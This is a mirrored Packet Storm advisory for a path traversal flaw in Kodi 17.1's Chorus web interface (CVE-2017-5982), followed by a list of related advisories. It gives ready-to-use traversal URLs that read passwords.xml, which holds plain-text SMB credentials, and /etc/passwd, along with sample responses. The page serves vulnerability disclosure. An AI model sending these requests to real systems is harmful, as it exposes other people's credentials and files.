Lucene search
Eric FlokstraPACKETSTORM:141103HistoryFeb 15, 2017 - 12:00 a.m.
Kodi 17.1 Local File Inclusion
2017-02-1500:00:00
Eric Flokstra
packetstormsecurity.com
51
0.052 Low
EPSS
Percentile
93.0%
`# Exploit Title: Kodi - Local File Inclusion
# Date: 12 February 2017
# Exploit Author: Eric Flokstra
# Vendor Homepage: https://kodi.tv/
# Software Link: https://kodi.tv/download/
# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
# Tested on: Linux
# CVE: CVE-2017-5982
Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation. Chorus is a web interface
for controlling and interacting with Kodi. It is hosted by the Kodi
installation.
The web interface loads a thumbnail of an image, video or add-on when
selecting a category in the left menu with the following request:
http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F
Insufficient validation of user input is performed on this URL resulting
in a local file inclusion vulnerability. This enables attackers
to retrieve arbitrary files from the filesystem by changing the location
after the '/image/image%3A%2F%2Fa part.
<--Examples-->
1) If Kodi is connected to a NAS the following request can be used to
obtain plain-text SMB credentials:
http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
Response:
<passwords><path><from pathversion="1">smb://192.168.1.15/</from><to
pathversion="1">smb://username:[email protected]//share</to></path></passwords>
2) Request to retrieve the content of /etc/passwd:
http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
--
---------------------------------------------------------------------
PGP Key ID = 0x6D336541EAB627EE
Fingerprint = DFBB E38E D848 4658 EC4C D161 6D33 6541 EAB6 27EE
https://pgp.mit.edu/pks/[email protected]&op=index
---------------------------------------------------------------------
`
Related
nessus
nessus
Kodi Local File Inclusion Information Disclosure
2017-03-22 00:00:00
Debian dla-3712 : kodi - security update
2024-01-23 00:00:00
cve
cve
CVE-2017-5982
2017-02-28 18:59:00
nuclei
nuclei
Kodi 17.1 - Local File Inclusion
2021-11-04 22:49:01
cvelist
cvelist
CVE-2017-5982
2017-02-28 00:00:00
openvas
openvas
Kodi Local File Inclusion Vulnerability
2017-02-13 00:00:00
Debian: Security Advisory (DLA-3712-1)
2024-01-18 00:00:00
debiancve
debiancve
CVE-2017-5982
2017-02-28 18:59:00
veracode
veracode
Path Traversal
2024-01-21 03:44:25
ubuntucve
ubuntucve
CVE-2017-5982
2017-02-28 00:00:00
zdt
zdt
Kodi 17.0 Local File Inclusion Exploit
2017-03-13 00:00:00
prion
prion
Directory traversal
2017-02-28 18:59:00
nvd
nvd
CVE-2017-5982
2017-02-28 18:59:00
osv
osv
kodi - security update
2024-01-17 00:00:00
debian
debian
[SECURITY] [DLA 3712-1] kodi security update
2024-01-23 06:14:25